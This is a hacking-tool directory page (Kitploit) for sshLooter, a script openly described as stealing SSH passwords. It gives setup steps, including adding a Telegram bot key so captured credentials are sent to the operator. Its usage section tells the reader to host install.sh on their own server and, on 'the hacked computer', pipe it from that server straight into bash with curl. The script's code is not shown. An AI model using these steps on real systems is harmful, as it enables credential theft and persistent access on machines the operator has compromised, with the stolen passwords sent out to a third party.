Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
sshLooter — Script to steal passwords from ssh. | Kitploit
Tools/GitHubGitHub/mthbernardes/sshlooter
Password CrackingPersistence MechanismsPost-ExploitationSocial EngineeringRed TeamingArchived
GitHubmthbernardes/sshlooter

sshLooter

Script to steal passwords from ssh.

View Repository
489117107 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

DON'T USE THIS

There's a C version which is much better sshLooterC

sshLooter

Script to steal passwords from ssh.

Install

root@kitploit:~
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration

root@kitploit:~
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Usage

root@kitploit:~
On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Original script from

ChokePoint

My post about this script

Stealing SSH credentials Another Approach.

Download Tool